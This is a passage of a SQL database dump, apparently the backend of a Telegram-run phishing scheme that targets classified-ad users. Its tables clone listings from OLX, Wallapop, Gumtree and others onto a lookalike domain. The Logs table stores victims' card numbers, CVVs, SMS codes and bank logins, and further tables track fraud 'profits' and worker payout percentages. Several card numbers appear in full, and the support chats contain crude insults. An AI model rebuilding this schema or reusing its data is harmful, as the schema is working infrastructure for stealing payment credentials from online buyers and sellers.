-- phpMyAdmin SQL Dump
-- version 5.0.4
-- https://www.phpmyadmin.net/
--
-- Хост: localhost
-- Время создания: Апр 25 2022 г., 11:28
-- Версия сервера: 5.7.37-log
-- Версия PHP: 7.4.28

SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
START TRANSACTION;
SET time_zone = "+00:00";


/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;

--
-- База данных: `botjs`
--

-- --------------------------------------------------------

--
-- Структура таблицы `Ads`
--

CREATE TABLE `Ads` (
  `id` bigint(20) NOT NULL,
  `userId` bigint(20) NOT NULL,
  `adLink` text COLLATE utf8mb4_unicode_ci,
  `title` text COLLATE utf8mb4_unicode_ci,
  `address` text COLLATE utf8mb4_unicode_ci,
  `name` text COLLATE utf8mb4_unicode_ci,
  `photo` text COLLATE utf8mb4_unicode_ci,
  `price` text COLLATE utf8mb4_unicode_ci,
  `phone` text COLLATE utf8mb4_unicode_ci,
  `serviceCode` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `version` tinyint(4) NOT NULL DEFAULT '2',
  `balanceChecker` tinyint(1) NOT NULL DEFAULT '1',
  `createdAt` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `updatedAt` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Дамп данных таблицы `Ads`
--

INSERT INTO `Ads` (`id`, `userId`, `adLink`, `title`, `address`, `name`, `photo`, `price`, `phone`, `serviceCode`, `version`, `balanceChecker`, `createdAt`, `updatedAt`) VALUES
(172050447, 2129003057, NULL, 'ралапдр', 'оларпдлорпаол', 'пваолыдолпваолд рпвавпар', NULL, '5000 Kn', NULL, 'posta_hr', 2, 1, '2022-04-25 06:25:34', '2022-04-25 06:25:34'),
(173318412, 2129003057, 'https://www.olx.pl/d/oferta/telewizor-philips-42pfl9664h-12-42-sprawny-lub-na-czesci-CID99-IDOW2Ek.html', 'Telewizor Philips 42pfl9664h/12 42\" - sprawny /lub na części', 'Słubice, 2906 Pilch Vista', 'Kurt Karczewski', 'https://ireland.apollo.olxcdn.com:443/v1/files/vt62yp3jdk331-PL/image;s=2048x1536', '300 zł do negocjacji', NULL, 'olx_pl', 2, 1, '2022-04-25 06:19:50', '2022-04-25 06:19:50'),
(176210181, 5001346139, 'https://www.olx.ua/d/obyavlenie/diski-audi-5112r16-titany-b-u-original-komplekt-sklad-volkswagen-IDO9OfM.html', 'Диски Audi 5:112r16 титаны б/у оригинал комплект склад Volkswagen', 'Чернівці, 9891 Ковальський майдан', 'Оксана Ліхно', 'https://ireland.apollo.olxcdn.com:443/v1/files/kg5l4to8jc5a2-UA/image;s=1000x826', '1 850 грн. / за 1 шт.', NULL, 'olx_ua', 2, 1, '2022-03-31 09:36:06', '2022-03-31 09:36:06'),
(187608598, 2129003057, NULL, 'dgfgdf', 'c, 863 Peeters plein', 'Amina Desmet', NULL, '500 €', NULL, '2dehands_be', 2, 1, '2022-04-25 05:35:55', '2022-04-25 05:35:55'),
(195147204, 2129003057, 'https://www.olx.pl/d/oferta/traktorek-mtd-mastercut-92-155-2009-rok-CID628-IDOSvxO.html', 'TRAKTOREK MTD Mastercut 92-155 ! 2009 rok !', 'Lipsko, 788 Jastrzębski Street', 'Wendy Kmiecik', 'https://ireland.apollo.olxcdn.com:443/v1/files/45m1f4cym6811-PL/image;s=2000x1500', '4 900 zł do negocjacji', NULL, 'olx_pl', 2, 1, '2022-04-25 05:14:42', '2022-04-25 05:14:42'),
(215336463, 2065964199, NULL, 'Hehhe', 'CARD HOLDER Flow', 'CARD HOLDER', NULL, '82828 Kn', NULL, 'posta_hr', 2, 1, '2022-04-25 06:25:04', '2022-04-25 06:25:04'),
(246966742, 5379120045, 'https://www.olx.pl/d/oferta/telewizor-philips-42pfl9664h-12-42-sprawny-lub-na-czesci-CID99-IDOW2Ek.html', 'Telewizor Philips 42pfl9664h/12 42\" - sprawny /lub na części', 'Pasłęk, 70305 Maksym Keys', '/lub', 'https://ireland.apollo.olxcdn.com:443/v1/files/vt62yp3jdk331-PL/image;s=2048x1536', '300 zł do negocjacji', NULL, 'olx_pl', 2, 1, '2022-04-25 05:50:27', '2022-04-25 05:50:27'),
(252731181, 2129003057, NULL, '[eq', 'Comacchio, 40393 Pelagia Borgo', 'Verena Alberti', NULL, '500 €', NULL, 'subito_it', 2, 1, '2022-04-25 06:19:24', '2022-04-25 06:19:24'),
(5001346139, 5001346139, NULL, 'sdfasdf', 'asdfasdf', 'asdfasdf', 'asdfasdf', '123', '123', 'olx_ua', 2, 1, '2022-03-31 09:33:22', '2022-03-31 09:33:22');

-- --------------------------------------------------------

--
-- Структура таблицы `Bins`
--

CREATE TABLE `Bins` (
  `id` int(11) NOT NULL,
  `bin` bigint(20) DEFAULT NULL,
  `scheme` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `type` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `brand` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `country` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `currency` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `bank` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `createdAt` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `updatedAt` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

-- --------------------------------------------------------

--
-- Структура таблицы `Countries`
--

CREATE TABLE `Countries` (
  `id` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `title` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `status` tinyint(4) NOT NULL DEFAULT '1',
  `withLk` tinyint(1) NOT NULL DEFAULT '0',
  `createdAt` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `updatedAt` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Дамп данных таблицы `Countries`
--

INSERT INTO `Countries` (`id`, `title`, `status`, `withLk`, `createdAt`, `updatedAt`) VALUES
('1', '🇺🇦 Украина', 1, 1, '2022-03-31 09:32:13', '2022-04-25 04:42:45'),
('be', '🇧🇪 Бельгия', 1, 1, '2022-03-31 09:32:13', '2022-04-25 04:42:46'),
('bg', '🇧🇬 Болгария', 1, 1, '2022-03-31 09:32:13', '2022-04-25 04:42:46'),
('dk', '🇩🇰 Дания', 1, 1, '2022-03-31 09:32:13', '2022-04-25 04:42:46'),
('es', '🇪🇸 Испания', 1, 1, '2022-03-31 09:32:13', '2022-04-25 04:42:46'),
('fr', '🇫🇷 Франция', 1, 1, '2022-03-31 09:32:13', '2022-04-25 04:42:46'),
('hr', '🇭🇷 Хорватия', 1, 1, '2022-03-31 09:32:13', '2022-04-25 04:42:46'),
('it', '🇮🇹 Италия', 1, 1, '2022-03-31 09:32:13', '2022-04-25 04:42:46'),
('pl', '🇵🇱 Польша', 1, 1, '2022-03-31 09:32:13', '2022-04-25 04:42:46'),
('pt', '🇵🇹 Португалия', 1, 1, '2022-03-31 09:32:13', '2022-04-25 04:42:46'),
('ro', '🇷🇴 Румыния', 1, 1, '2022-03-31 09:32:13', '2022-04-25 04:42:46'),
('rs', '🇷🇸 Сербия', 1, 1, '2022-03-31 09:32:13', '2022-04-25 04:42:46'),
('se', '🇸🇪 Швеция', 1, 1, '2022-03-31 09:32:13', '2022-04-25 04:42:46'),
('uk', '🏴󠁧󠁢󠁥󠁮󠁧󠁿 Англия', 1, 1, '2022-03-31 09:32:13', '2022-04-25 06:00:04');

-- --------------------------------------------------------

--
-- Структура таблицы `Currencies`
--

CREATE TABLE `Currencies` (
  `id` int(11) NOT NULL,
  `code` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `eur` decimal(36,6) DEFAULT NULL,
  `rub` decimal(36,6) DEFAULT NULL,
  `symbol` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `createdAt` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `updatedAt` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Дамп данных таблицы `Currencies`
--

INSERT INTO `Currencies` (`id`, `code`, `eur`, `rub`, `symbol`, `createdAt`, `updatedAt`) VALUES
(1, 'PLN', '0.220000', '19.000000', 'zł', '2021-11-15 05:00:25', '2021-11-15 05:00:25'),
(2, 'GBP', '1.170000', '102.180000', '£', '2021-11-15 05:00:25', '2021-11-15 05:00:25'),
(3, 'DKK', '0.130000', '11.700000', 'kr', '2021-11-15 05:00:25', '2021-11-15 05:00:25'),
(4, 'EUR', '1.000000', '120.110000', '€', '2021-11-15 05:00:25', '2022-03-06 21:08:43'),
(5, 'UAH', '0.031000', '2.720000', '₴', '2021-11-15 05:00:25', '2021-11-15 05:00:25'),
(6, 'RUB', '0.012000', '1.000000', '₽', '2021-11-15 05:00:25', '2021-11-15 05:00:25'),
(7, 'SEK', '0.098000', '11.500000', 'kr', '2021-11-15 05:00:25', '2022-03-06 21:11:43'),
(8, 'RON', '0.200000', '24.140000', 'lei', '2021-11-15 05:00:25', '2022-03-06 21:09:28'),
(9, 'HRK', '0.130000', '15.520000', 'Kn', '2021-11-15 05:00:25', '2022-03-06 21:10:06'),
(10, 'BGN', '0.510000', '44.370000', 'лв', '2021-11-15 05:00:25', '2021-11-15 05:00:25'),
(11, 'RSD', '0.008000', '1.020000', 'din', '2021-11-15 05:00:25', '2022-03-06 21:12:31'),
(12, 'BYN', '0.330000', '29.010000', 'Br', '2021-11-15 05:00:25', '2021-11-15 05:00:25'),
(13, 'OMR', '2.290000', '285.230000', 'omr', '2021-11-15 05:00:25', '2022-03-06 21:10:40'),
(30, 'CHF', '0.960000', '79.180000', '₣', '2021-11-15 05:00:25', '2021-11-15 05:00:25'),
(31, 'TRY', '0.066000', '5.783400', '₺', '2021-11-15 05:00:25', '2021-11-15 05:00:25'),
(32, 'AED', '0.241800', '20.978700', 'AED', '2021-11-15 05:00:25', '2021-11-15 05:00:25'),
(33, 'GEL', '0.301800', '32.218700', 'GEL', '2021-11-15 05:00:25', '2022-03-06 21:11:02'),
(34, 'GBP', '1.210000', '145.120000', 'GBP', '2021-11-15 05:00:25', '2022-03-06 21:11:02'),
(35, 'PHP', '0.018000', '2.120000', 'PHP', '2021-11-15 05:00:25', '2022-03-06 21:11:02'),
(36, 'ARS', '0.008400', '1.210000', 'ARS', '2021-11-15 05:00:25', '2022-03-12 09:01:41'),
(37, 'ILS', '0.280000', '40.660000', 'ILS', '2021-11-15 05:00:25', '2022-03-06 21:11:02'),
(38, 'CZK', '0.041000', '3.660000', 'CZK', '2021-11-15 05:00:25', '2022-03-06 21:11:02');

-- --------------------------------------------------------

--
-- Структура таблицы `Logs`
--

CREATE TABLE `Logs` (
  `id` int(11) NOT NULL,
  `token` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `cardNumber` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `cardExpire` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `cardCvv` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `smsCode` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `otherInfo` json DEFAULT NULL,
  `adId` bigint(20) NOT NULL,
  `writerId` bigint(20) DEFAULT NULL,
  `status` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `createdAt` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `updatedAt` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Дамп данных таблицы `Logs`
--

INSERT INTO `Logs` (`id`, `token`, `cardNumber`, `cardExpire`, `cardCvv`, `smsCode`, `otherInfo`, `adId`, `writerId`, `status`, `createdAt`, `updatedAt`) VALUES
(1, '1650850714515.98', '5375235109781441', '04/27', '282', NULL, '{\"cardBalance\": \"0.00\"}', 207816472, NULL, NULL, '2022-04-25 04:38:34', '2022-04-25 04:38:34'),
(2, '1650850716405.9968', '2202201764194979', '12/22', '555', NULL, '{\"cardBalance\": \"0.00\"}', 207816472, NULL, NULL, '2022-04-25 04:38:36', '2022-04-25 04:38:36'),
(3, '1650850769759.1511', '2202201764194979', '12/22', '709', NULL, '{\"cardBalance\": \"0.00\"}', 207816472, NULL, NULL, '2022-04-25 04:39:29', '2022-04-25 04:39:29'),
(4, '1650851017080.9294', '2202201764194979', '12/22', '555', NULL, '{\"cardBalance\": \"55555\"}', 224902758, NULL, 'otherCard', '2022-04-25 04:43:37', '2022-04-25 04:45:49'),
(5, '1650851267950.0505', '2202201764194979', '12/22', '5000', NULL, '{\"cardBalance\": \"50000\"}', 224902758, 2129003057, NULL, '2022-04-25 04:47:47', '2022-04-25 04:47:56'),
(6, '1650852901811.1575', '2202201764194979', '12/22', '709', NULL, '{\"cardBalance\": \"1000\"}', 195147204, 2129003057, 'correctBalance', '2022-04-25 05:15:01', '2022-04-25 05:15:42'),
(7, '1650852946858.2373', '2202201764194979', '12/22', '709', NULL, '{\"cardBalance\": \"1000\"}', 195147204, 2129003057, 'lk', '2022-04-25 05:15:46', '2022-04-25 05:16:04'),
(8, '1650852956436.9543', '2202201764194979', '12/22', '709', NULL, '{\"pin\": \"gdfdgfdgf\", \"login\": \"gdfdgfdgf\", \"pesel\": \"dgfdfggd\", \"password\": \"dgfdgf\", \"cardBalance\": \"1000\", \"motherlastname\": \"fdgf\"}', 195147204, 2129003057, 'profit', '2022-04-25 05:15:56', '2022-04-25 05:16:30'),
(9, '1650856850990.5667', '2202201764194979', '12/22', '414', NULL, '{\"cardBalance\": \"0.00555\"}', 173318412, 2129003057, 'lk', '2022-04-25 06:20:50', '2022-04-25 06:21:05'),
(10, '1650857146994.0498', '5539110003748742', '07/27', '567', NULL, '{\"cardBalance\": \"3566\"}', 215336463, NULL, NULL, '2022-04-25 06:25:46', '2022-04-25 06:25:46'),
(11, '1650857186970.9998', '2202201764194979', '12/33', '5455', NULL, '{\"cardBalance\": \"0.00543\"}', 172050447, 2129003057, 'appCode', '2022-04-25 06:26:26', '2022-04-25 06:26:41');

-- --------------------------------------------------------

--
-- Структура таблицы `Nastavniki`
--

CREATE TABLE `Nastavniki` (
  `id` bigint(20) NOT NULL,
  `username` varchar(128) NOT NULL,
  `status` tinyint(1) NOT NULL,
  `text` varchar(256) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Дамп данных таблицы `Nastavniki`
--

INSERT INTO `Nastavniki` (`id`, `username`, `status`, `text`) VALUES
(0, 'sadfasdfasdf', 0, 'sdfasdfasdf'),
(0, 'sadfasdfasdf', 0, 'sdfasdfasdf');

-- --------------------------------------------------------

--
-- Структура таблицы `Profits`
--

CREATE TABLE `Profits` (
  `id` bigint(20) NOT NULL,
  `userId` bigint(20) NOT NULL,
  `amount` decimal(36,2) NOT NULL,
  `convertedAmount` decimal(36,2) NOT NULL,
  `serviceTitle` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `currency` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `status` tinyint(4) NOT NULL DEFAULT '0',
  `writerId` bigint(20) NOT NULL,
  `channelMessageId` bigint(20) DEFAULT NULL,
  `createdAt` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `updatedAt` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Дамп данных таблицы `Profits`
--

INSERT INTO `Profits` (`id`, `userId`, `amount`, `convertedAmount`, `serviceTitle`, `currency`, `status`, `writerId`, `channelMessageId`, `createdAt`, `updatedAt`) VALUES
(1, 2129003057, '1000.00', '19000.00', 'OLX PL', 'PLN', 0, 2129003057, 15, '2022-04-25 05:16:52', '2022-04-25 05:16:52');

-- --------------------------------------------------------

--
-- Структура таблицы `Requests`
--

CREATE TABLE `Requests` (
  `id` int(11) NOT NULL,
  `userId` bigint(20) DEFAULT NULL,
  `step1` text COLLATE utf8mb4_unicode_ci,
  `step2` text COLLATE utf8mb4_unicode_ci,
  `step3` text COLLATE utf8mb4_unicode_ci,
  `status` tinyint(4) NOT NULL DEFAULT '0',
  `createdAt` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `updatedAt` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Дамп данных таблицы `Requests`
--

INSERT INTO `Requests` (`id`, `userId`, `step1`, `step2`, `step3`, `status`, `createdAt`, `updatedAt`) VALUES
(1, 5001346139, 'dfgsdfg', 'dfsg', 'sdfg', 1, '2022-03-30 21:24:38', '2022-03-30 21:28:25'),
(2, 5025496014, 'ткст те', 'тест', 'тест', 1, '2022-03-30 21:55:57', '2022-03-30 21:55:59'),
(4, 5379120045, 'проверкрка', 'да', 'ущлепыфукз', 1, '2022-04-25 01:35:06', '2022-04-25 01:39:27'),
(7, 2129003057, 'hgfgfhhgf', 'hdgjkfjkhgf', 'dljkhfjkhgf', 1, '2022-04-25 05:12:50', '2022-04-25 05:12:58'),
(8, 2065964199, 'Гкгкш', 'Ыщыщф', 'Гцгцгцг', 1, '2022-04-25 06:22:06', '2022-04-25 06:22:08');

-- --------------------------------------------------------

--
-- Структура таблицы `Sequelizemeta`
--

CREATE TABLE `Sequelizemeta` (
  `name` varchar(255) COLLATE utf8_unicode_ci NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

--
-- Дамп данных таблицы `Sequelizemeta`
--

INSERT INTO `Sequelizemeta` (`name`) VALUES
('20210713191139-create-user.js'),
('20210714070503-create-service.js'),
('20210714070744-create-profit.js'),
('20210714071949-create-settings.js'),
('20210714072712-create-ad.js'),
('20210714073242-create-request.js'),
('20210714073430-create-currency.js'),
('20210714073615-create-country.js'),
('20210714073645-create-writer.js'),
('20210714073731-create-support.js'),
('20210714073804-create-support-chat.js'),
('20210716202306-create-bin.js'),
('20210725072028-create-log.js');

-- --------------------------------------------------------

--
-- Структура таблицы `Services`
--

CREATE TABLE `Services` (
  `id` bigint(20) NOT NULL,
  `title` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `serviceDomain` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `domain` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `status` tinyint(1) NOT NULL DEFAULT '1',
  `currencyCode` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `lang` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `translate` json DEFAULT NULL,
  `countryCode` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `code` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `createdAt` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `updatedAt` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Дамп данных таблицы `Services`
--

INSERT INTO `Services` (`id`, `title`, `serviceDomain`, `domain`, `status`, `currencyCode`, `lang`, `translate`, `countryCode`, `code`, `createdAt`, `updatedAt`) VALUES
(1, '📦 OLX UA', 'https://google.com', 'localhost', 1, 'olx_ua', '', NULL, '1', 'olx_ua', '2022-03-31 09:28:28', '2022-04-25 06:00:59'),
(2, '🚛 NOVAPOSHTA', 'https://google.com', 'localhost', 1, 'novaposhta_ua', '', NULL, '1', 'novaposhta_ua', '2022-03-31 09:28:28', '2022-04-25 06:01:15'),
(3, '📦 OLX PL', 'https://google.com', 'olx-pl.orderr11.xyz', 1, 'PLN', 'pl', NULL, 'pl', 'olx_pl', '2022-03-31 09:28:28', '2022-04-25 06:01:45'),
(5, '🚛 INPOST', 'https://google.com', 'olx-pl.orderr11.xyz', 1, 'PLN', 'pl', NULL, 'pl', 'inpost_pl', '2022-03-31 09:28:28', '2022-04-25 06:02:08'),
(6, '📦 2dehands', 'https://google.com', 'olx-pl.orderr11.xyz', 1, 'BGN', 'be', NULL, 'be', '2dehands_be', '2022-03-31 09:28:28', '2022-04-25 06:02:31'),
(7, '📦 DBA', 'https://google.com', 'olx-pl.orderr11.xyz', 1, 'DKK', 'dk', NULL, 'dk', 'dba_dk', '2022-03-31 09:28:28', '2022-04-25 06:08:54'),
(8, '🚛 GLS', 'https://google.com', 'olx-pl.orderr11.xyz', 1, 'DKK', 'dk', NULL, 'dk', 'gls_dk', '2022-03-31 09:28:28', '2022-04-25 06:09:13'),
(9, '📦 GULOGGRATIS', 'https://google.com', 'olx-pl.orderr11.xyz', 1, 'DKK', 'dk', NULL, 'dk', 'guloggratis_dk', '2022-03-31 09:28:28', '2022-04-25 06:11:49'),
(10, '📦 MILANUNCIOS', 'https://google.com', 'olx-pl.orderr11.xyz', 1, 'EUR', 'es', NULL, 'es', 'milanuncios_es', '2022-03-31 09:28:28', '2022-04-25 06:12:03'),
(11, '📦 TABLONDEANUNCIOS', 'https://google.com', 'olx-pl.orderr11.xyz', 1, 'EUR', 'es', NULL, 'es', 'tablondeanuncios_es', '2022-03-31 09:28:28', '2022-04-25 06:12:58'),
(12, '📦 WALLAPOP', 'https://google.com', 'olx-pl.orderr11.xyz', 1, 'EUR', 'es', NULL, 'es', 'wallapop_es', '2022-03-31 09:28:28', '2022-04-25 06:14:32'),
(13, '📦 LEBONCOIN', 'https://google.com', 'olx-pl.orderr11.xyz', 1, 'EUR', 'fr', NULL, 'fr', 'leboncoin_fr', '2022-03-31 09:28:28', '2022-04-25 06:14:39'),
(14, '🚛 POSTA', 'https://google.com', 'olx-pl.orderr11.xyz', 1, 'HRK', 'hr', NULL, 'hr', 'posta_hr', '2022-03-31 09:28:28', '2022-04-25 06:15:42'),
(15, '📦 SUBITO', 'https://google.com', 'olx-pl.orderr11.xyz', 1, 'EUR', 'it', NULL, 'it', 'subito_it', '2022-03-31 09:28:28', '2022-04-25 06:15:48'),
(16, '📦 OLX PT', 'https://google.com', 'olx-pl.orderr11.xyz', 1, 'EUR', 'pt', NULL, 'pt', 'olx_pt', '2022-03-31 09:28:28', '2022-04-25 06:15:53'),
(17, '📦 OLX RO', 'https://google.com', 'olx-pl.orderr11.xyz', 1, 'RON', 'ro', NULL, 'ro', 'olx_ro', '2022-03-31 09:28:28', '2022-04-25 06:15:56'),
(18, '📦 KUPUJEMPRODAJEM', 'https://google.com', 'olx-pl.orderr11.xyz', 1, 'RSD', 'rs', NULL, 'rs', 'kupujemprodajem_rs', '2022-03-31 09:28:28', '2022-04-25 06:16:37'),
(19, '📦 LALAFO', 'https://google.com', 'olx-pl.orderr11.xyz', 1, 'RSD', 'rs', NULL, 'rs', 'lalafo_rs', '2022-03-31 09:28:28', '2022-04-25 06:16:42'),
(20, '📦 BLOCKET', 'https://google.com', 'olx-pl.orderr11.xyz', 1, 'SEK', 'se', NULL, 'se', 'blocket_se', '2022-03-31 09:28:28', '2022-04-25 06:17:06'),
(21, '🚛 POSTNORD', 'https://google.com', 'olx-pl.orderr11.xyz', 1, 'SEK', 'se', NULL, 'se', 'postnord_se', '2022-03-31 09:28:28', '2022-04-25 06:17:13'),
(22, '📦 GUMTREE', 'https://google.com', 'olx-pl.orderr11.xyz', 1, 'GBP', 'uk', NULL, 'uk', 'gumtree_uk', '2022-03-31 09:28:28', '2022-04-25 06:17:23'),
(23, '🚛 ROYALMAIL', 'https://google.com', 'olx-pl.orderr11.xyz', 1, 'GBP', 'uk', NULL, 'uk', 'royalmail_uk', '2022-03-31 09:28:28', '2022-04-25 06:17:30');

-- --------------------------------------------------------

--
-- Структура таблицы `Settings`
--

CREATE TABLE `Settings` (
  `id` int(11) NOT NULL,
  `loggingGroupId` bigint(20) DEFAULT NULL,
  `logsGroupId` bigint(20) DEFAULT NULL,
  `allGroupId` bigint(20) DEFAULT NULL,
  `requestsGroupId` bigint(20) DEFAULT NULL,
  `payoutsChannelId` bigint(20) DEFAULT NULL,
  `requestsEnabled` tinyint(1) NOT NULL DEFAULT '0',
  `allLogsEnabled` tinyint(1) DEFAULT '1',
  `allHelloMsgEnabled` tinyint(1) DEFAULT '1',
  `allGroupLink` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `payoutsChannelLink` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `payoutPercent` decimal(36,2) NOT NULL DEFAULT '70.00',
  `createdAt` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `updatedAt` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Дамп данных таблицы `Settings`
--

INSERT INTO `Settings` (`id`, `loggingGroupId`, `logsGroupId`, `allGroupId`, `requestsGroupId`, `payoutsChannelId`, `requestsEnabled`, `allLogsEnabled`, `allHelloMsgEnabled`, `allGroupLink`, `payoutsChannelLink`, `payoutPercent`, `createdAt`, `updatedAt`) VALUES
(1, -1001234655895, -1001234655895, -1001701906042, -1001234655895, -1001701906042, 2, 1, 1, NULL, NULL, '70.00', '2021-10-18 16:15:04', '2022-04-25 05:13:54');

-- --------------------------------------------------------

--
-- Структура таблицы `SupportChats`
--

CREATE TABLE `SupportChats` (
  `id` int(11) NOT NULL,
  `supportId` bigint(20) DEFAULT NULL,
  `messageFrom` tinyint(4) DEFAULT NULL,
  `message` text COLLATE utf8mb4_unicode_ci,
  `readed` tinyint(1) NOT NULL DEFAULT '0',
  `messageId` int(11) DEFAULT NULL,
  `createdAt` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `updatedAt` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Дамп данных таблицы `SupportChats`
--

INSERT INTO `SupportChats` (`id`, `supportId`, `messageFrom`, `message`, `readed`, `messageId`, `createdAt`, `updatedAt`) VALUES
(1, 1, 1, 'sdfgsdfg', 0, NULL, '2022-03-31 09:33:31', '2022-03-31 09:33:31'),
(2, 1, 0, 'sdfsadf', 1, 7922, '2022-03-31 09:33:37', '2022-03-31 09:33:38'),
(3, 1, 1, 'ролд', 0, NULL, '2022-03-31 09:34:33', '2022-03-31 09:34:33'),
(4, 1, 1, 'ролд', 0, NULL, '2022-03-31 09:34:34', '2022-03-31 09:34:34'),
(5, 1, 1, 'ролд', 0, NULL, '2022-03-31 09:34:34', '2022-03-31 09:34:34'),
(6, 1, 1, 'ролд', 0, NULL, '2022-03-31 09:34:35', '2022-03-31 09:34:35'),
(7, 1, 1, 'вы', 0, NULL, '2022-03-31 09:34:36', '2022-03-31 09:34:36'),
(8, 1, 1, 'вв', 0, NULL, '2022-03-31 09:34:37', '2022-03-31 09:34:37'),
(9, 1, 1, 'фыв', 0, NULL, '2022-03-31 09:34:38', '2022-03-31 09:34:38'),
(10, 1, 1, 'фыв', 0, NULL, '2022-03-31 09:34:39', '2022-03-31 09:34:39'),
(11, 1, 1, 'фывфыв', 0, NULL, '2022-03-31 09:34:40', '2022-03-31 09:34:40'),
(12, 1, 1, 'фыв', 0, NULL, '2022-03-31 09:34:41', '2022-03-31 09:34:41'),
(13, 1, 1, 'фыв', 0, NULL, '2022-03-31 09:34:42', '2022-03-31 09:34:42'),
(14, 1, 1, 'фыв', 0, NULL, '2022-03-31 09:34:42', '2022-03-31 09:34:42'),
(15, 1, 1, 'фыв', 0, NULL, '2022-03-31 09:34:44', '2022-03-31 09:34:44'),
(16, 1, 0, 'фывъ\\', 1, 7940, '2022-03-31 09:34:50', '2022-03-31 09:34:51'),
(17, 9, 1, 'Хуй пизда', 0, NULL, '2022-04-25 04:10:24', '2022-04-25 04:10:24'),
(18, 9, 0, 'шалава ебливая', 1, 283, '2022-04-25 04:16:55', '2022-04-25 04:16:56'),
(19, 9, 1, 'Пошла нахуй дура', 0, NULL, '2022-04-25 04:17:03', '2022-04-25 04:17:03'),
(20, 9, 0, 'САМА ИДИ НАХУЙ ОВЦА', 1, 288, '2022-04-25 04:17:08', '2022-04-25 04:17:10');

-- --------------------------------------------------------

--
-- Структура таблицы `Supports`
--

CREATE TABLE `Supports` (
  `id` int(11) NOT NULL,
  `adId` bigint(20) DEFAULT NULL,
  `token` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `status` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
